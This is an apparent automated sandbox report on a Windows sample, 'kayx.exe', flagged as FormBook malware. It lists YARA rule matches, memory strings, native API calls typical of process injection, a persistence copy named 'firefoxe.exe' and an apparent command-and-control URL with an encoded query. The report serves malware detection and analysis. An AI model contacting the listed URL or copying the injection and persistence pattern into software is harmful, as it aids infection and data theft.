Source: explorer.exe, 00000012.00000000.374682717.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 00000012.00000000.374682717.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: explorer.exe, 00000012.00000000.374682717.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: explorer.exe, 00000012.00000000.374682717.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 00000012.00000000.374682717.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: explorer.exe, 00000012.00000000.374682717.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 00000012.00000000.374682717.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 00000012.00000000.374682717.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 00000012.00000000.374682717.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.tiro.com
Source: explorer.exe, 00000012.00000000.374682717.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 00000012.00000000.374682717.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: explorer.exe, 00000012.00000000.374682717.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn
Source: mstsc.exe, 00000015.00000002.487573696.000000000543D000.00000004.00000001.sdmp	String found in binary or memory: https://www.jiben.se/bg8v/?dR-0T=BcRzG6gD98FnRJnM8S7gZqeq6OFb5sR0iVW6Pm7cF5yWostREqJtYuV2Juo62Dzc0Jb

Source: firefoxe.exe, 00000013.00000002.483426018.000000000108B000.00000004.00000020.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

E-Banking Fraud:

Yara detected FormBook

Show sources

Source: Yara match	File source: 00000015.00000002.485444810.0000000002F00000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.396099862.0000000000830000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.396027525.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.484279657.0000000000A00000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.396259639.0000000000980000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000001.351516494.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.352630853.00000000041E1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 17.2.kayx.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.1.kayx.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.1.kayx.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.kayx.exe.400000.0.raw.unpack, type: UNPACKEDPE

System Summary:

Malicious sample detected (through community Yara rule)

Show sources

Source: 00000015.00000002.485444810.0000000002F00000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000015.00000002.485444810.0000000002F00000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000011.00000002.396099862.0000000000830000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000011.00000002.396099862.0000000000830000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000011.00000002.396027525.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000011.00000002.396027525.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000015.00000002.484279657.0000000000A00000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000015.00000002.484279657.0000000000A00000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000011.00000002.396259639.0000000000980000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000011.00000002.396259639.0000000000980000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000011.00000001.351516494.0000000000400000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000011.00000001.351516494.0000000000400000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.352630853.00000000041E1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.352630853.00000000041E1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 17.2.kayx.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 17.2.kayx.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 17.1.kayx.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 17.1.kayx.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 17.1.kayx.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 17.1.kayx.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 17.2.kayx.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 17.2.kayx.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group

Source: C:\Users\user\Desktop\kayx.exe	Code function: 1_2_05C4AAF0 NtUnmapViewOfSection,	1_2_05C4AAF0
Source: C:\Users\user\Desktop\kayx.exe	Code function: 1_2_05C4AAE8 NtUnmapViewOfSection,	1_2_05C4AAE8
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00417B90 NtCreateFile,	17_2_00417B90
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00417C40 NtReadFile,	17_2_00417C40
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00417CC0 NtClose,	17_2_00417CC0
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00417D70 NtAllocateVirtualMemory,	17_2_00417D70
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00417B4A NtCreateFile,	17_2_00417B4A
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00417BE2 NtCreateFile,	17_2_00417BE2
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00417B8A NtCreateFile,	17_2_00417B8A
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00417CBF NtClose,	17_2_00417CBF
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00E498F0 NtReadVirtualMemory,LdrInitializeThunk,	17_2_00E498F0
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00E49860 NtQuerySystemInformation,LdrInitializeThunk,	17_2_00E49860
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00E49840 NtDelayExecution,LdrInitializeThunk,	17_2_00E49840
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00E499A0 NtCreateSection,LdrInitializeThunk,	17_2_00E499A0
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00E49910 NtAdjustPrivilegesToken,LdrInitializeThunk,	17_2_00E49910
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00E49A50 NtCreateFile,LdrInitializeThunk,	17_2_00E49A50
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00E49A20 NtResumeThread,LdrInitializeThunk,	17_2_00E49A20
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00E49A00 NtProtectVirtualMemory,LdrInitializeThunk,	17_2_00E49A00
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00E495D0 NtClose,LdrInitializeThunk,	17_2_00E495D0
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00E49540 NtReadFile,LdrInitializeThunk,	17_2_00E49540
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00E496E0 NtFreeVirtualMemory,LdrInitializeThunk,	17_2_00E496E0
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00E49660 NtAllocateVirtualMemory,LdrInitializeThunk,	17_2_00E49660
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00E49FE0 NtCreateMutant,LdrInitializeThunk,	17_2_00E49FE0
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00E497A0 NtUnmapViewOfSection,LdrInitializeThunk,	17_2_00E497A0
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00E49780 NtMapViewOfSection,LdrInitializeThunk,	17_2_00E49780
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00E49710 NtQueryInformationToken,LdrInitializeThunk,	17_2_00E49710
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00E498A0 NtWriteVirtualMemory,	17_2_00E498A0
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00E4B040 NtSuspendThread,	17_2_00E4B040
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00E49820 NtEnumerateKey,	17_2_00E49820
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00E499D0 NtCreateProcessEx,	17_2_00E499D0
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00E49950 NtQueueApcThread,	17_2_00E49950
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00E49A80 NtOpenDirectoryObject,	17_2_00E49A80
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00E49A10 NtQuerySection,	17_2_00E49A10
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00E4A3B0 NtGetContextThread,	17_2_00E4A3B0
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00E49B00 NtSetValueKey,	17_2_00E49B00
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00E495F0 NtQueryInformationFile,	17_2_00E495F0
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00E49560 NtWriteFile,	17_2_00E49560
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00E49520 NtWaitForSingleObject,	17_2_00E49520
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00E4AD30 NtSetContextThread,	17_2_00E4AD30
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00E496D0 NtCreateKey,	17_2_00E496D0
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00E49670 NtQueryInformationProcess,	17_2_00E49670
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00E49650 NtQueryValueKey,	17_2_00E49650
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00E49610 NtEnumerateValueKey,	17_2_00E49610
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00E49760 NtOpenProcess,	17_2_00E49760
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00E49770 NtSetInformationFile,	17_2_00E49770
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00E4A770 NtOpenThread,	17_2_00E4A770
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00E49730 NtQueryVirtualMemory,	17_2_00E49730
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00E4A710 NtOpenProcessToken,	17_2_00E4A710
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_1_00417B90 NtCreateFile,	17_1_00417B90
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_1_00417C40 NtReadFile,	17_1_00417C40
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_1_00417CC0 NtClose,	17_1_00417CC0
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_1_00417D70 NtAllocateVirtualMemory,	17_1_00417D70
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_1_00417B4A NtCreateFile,	17_1_00417B4A
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_1_00417BE2 NtCreateFile,	17_1_00417BE2
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_1_00417B8A NtCreateFile,	17_1_00417B8A
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_1_00417CBF NtClose,	17_1_00417CBF

Source: C:\Users\user\Desktop\kayx.exe	Code function: 1_2_01850C1C	1_2_01850C1C
Source: C:\Users\user\Desktop\kayx.exe	Code function: 1_2_05C42938	1_2_05C42938
Source: C:\Users\user\Desktop\kayx.exe	Code function: 1_2_05C46D00	1_2_05C46D00
Source: C:\Users\user\Desktop\kayx.exe	Code function: 1_2_05C46D10	1_2_05C46D10
Source: C:\Users\user\Desktop\kayx.exe	Code function: 1_2_05C426C0	1_2_05C426C0
Source: C:\Users\user\Desktop\kayx.exe	Code function: 1_2_05C426B1	1_2_05C426B1
Source: C:\Users\user\Desktop\kayx.exe	Code function: 1_2_05C42987	1_2_05C42987
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00401030	17_2_00401030
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_0041B091	17_2_0041B091
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00408A30	17_2_00408A30
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00402D87	17_2_00402D87
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00402D90	17_2_00402D90
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_0041BE80	17_2_0041BE80
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_0041BE8A	17_2_0041BE8A
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_0041C6AB	17_2_0041C6AB
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_0041C7F2	17_2_0041C7F2
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00402FB0	17_2_00402FB0
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00ED28EC	17_2_00ED28EC
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00E320A0	17_2_00E320A0
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00ED20A8	17_2_00ED20A8
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00E1B090	17_2_00E1B090
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00EDE824	17_2_00EDE824
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00E2A830	17_2_00E2A830
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00EC1002	17_2_00EC1002
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00E24120	17_2_00E24120
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00E0F900	17_2_00E0F900
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00ED22AE	17_2_00ED22AE
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00EBFA2B	17_2_00EBFA2B
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00EC03DA	17_2_00EC03DA
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00ECDBD2	17_2_00ECDBD2
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00E3EBB0	17_2_00E3EBB0
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00E2AB40	17_2_00E2AB40
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00ED2B28	17_2_00ED2B28
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00ECD466	17_2_00ECD466
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00E1841F	17_2_00E1841F
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00E1D5E0	17_2_00E1D5E0
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00ED25DD	17_2_00ED25DD
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00E32581	17_2_00E32581
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00ED1D55	17_2_00ED1D55
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00E00D20	17_2_00E00D20
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00ED2D07	17_2_00ED2D07
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00ED2EF7	17_2_00ED2EF7
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00E26E30	17_2_00E26E30
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00ECD616	17_2_00ECD616
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00ED1FF1	17_2_00ED1FF1
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00EDDFCE	17_2_00EDDFCE
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_1_00401030	17_1_00401030
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_1_0041B091	17_1_0041B091
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_1_00408A30	17_1_00408A30
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_1_00402D87	17_1_00402D87
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_1_00402D90	17_1_00402D90
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_1_0041BE80	17_1_0041BE80
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_1_0041BE8A	17_1_0041BE8A
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_1_0041C6AB	17_1_0041C6AB
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_1_0041C7F2	17_1_0041C7F2
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_1_00402FB0	17_1_00402FB0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exe	Code function: 19_2_01060C1C	19_2_01060C1C

Source: C:\Users\user\Desktop\kayx.exe	Code function: String function: 00419A40 appears 38 times
Source: C:\Users\user\Desktop\kayx.exe	Code function: String function: 00E0B150 appears 54 times

Source: kayx.exe, 00000001.00000002.355661594.00000000059B0000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenamemscorrc.dllT vs kayx.exe
Source: kayx.exe, 00000001.00000002.351671330.0000000000F28000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameVdltohs3.exel% vs kayx.exe
Source: kayx.exe, 00000001.00000002.352304174.000000000333A000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameClassLibrary3.dll< vs kayx.exe
Source: kayx.exe, 00000001.00000002.352630853.00000000041E1000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameKlghppetippu.dll4 vs kayx.exe
Source: kayx.exe, 0000000F.00000002.349503948.0000000000268000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameVdltohs3.exel% vs kayx.exe
Source: kayx.exe, 00000010.00000002.350319835.0000000000328000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameVdltohs3.exel% vs kayx.exe
Source: kayx.exe, 00000011.00000002.397054523.000000000108F000.00000040.00000001.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs kayx.exe
Source: kayx.exe, 00000011.00000000.350990783.0000000000468000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameVdltohs3.exel% vs kayx.exe
Source: kayx.exe, 00000011.00000002.397835707.0000000002C23000.00000040.00000001.sdmp	Binary or memory string: OriginalFilenamemstsc.exej% vs kayx.exe
Source: kayx.exe	Binary or memory string: OriginalFilenameVdltohs3.exel% vs kayx.exe

Source: 00000015.00000002.485444810.0000000002F00000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000015.00000002.485444810.0000000002F00000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000011.00000002.396099862.0000000000830000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000011.00000002.396099862.0000000000830000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000011.00000002.396027525.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000011.00000002.396027525.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000015.00000002.484279657.0000000000A00000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000015.00000002.484279657.0000000000A00000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000011.00000002.396259639.0000000000980000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000011.00000002.396259639.0000000000980000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000011.00000001.351516494.0000000000400000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000011.00000001.351516494.0000000000400000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000002.352630853.00000000041E1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000001.00000002.352630853.00000000041E1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 17.2.kayx.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 17.2.kayx.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 17.1.kayx.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 17.1.kayx.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 17.1.kayx.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 17.1.kayx.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 17.2.kayx.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 17.2.kayx.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research

Source: kayx.exe	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: firefoxe.exe.1.dr	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: kayx.exe, u0006/u0005.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: firefoxe.exe.1.dr, u0006/u0005.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 1.0.kayx.exe.ec0000.0.unpack, u0006/u0005.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 1.2.kayx.exe.ec0000.0.unpack, u0006/u0005.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 15.2.kayx.exe.200000.0.unpack, u0006/u0005.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 15.0.kayx.exe.200000.0.unpack, u0006/u0005.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 16.0.kayx.exe.2c0000.0.unpack, u0006/u0005.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 16.2.kayx.exe.2c0000.0.unpack, u0006/u0005.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 17.0.kayx.exe.400000.0.unpack, u0006/u0005.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 19.0.firefoxe.exe.9a0000.0.unpack, u0006/u0005.cs	Cryptographic APIs: 'TransformFinalBlock'
